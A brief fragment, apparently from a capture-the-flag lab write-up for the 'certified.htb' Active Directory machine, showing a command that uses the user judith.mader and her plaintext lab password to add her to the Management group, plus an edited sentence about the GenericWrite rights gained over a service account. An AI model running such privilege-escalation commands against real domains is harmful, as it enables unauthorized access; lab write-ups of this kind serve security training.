Post

 ❯ net rpc group addmem Management 'judith.mader' -U 'certified.htb'/'judith.mader'%'judith09' -S 'DC01.certified.htb'

-Now that we are a member of the MANAGEMENT group, we have GenericWrite permissions over the MANAGEMENT_SVC account.
+Now, as a member of MANAGEMENT, judith.mader inherited GenericWrite permissions over the management_svc account.

 1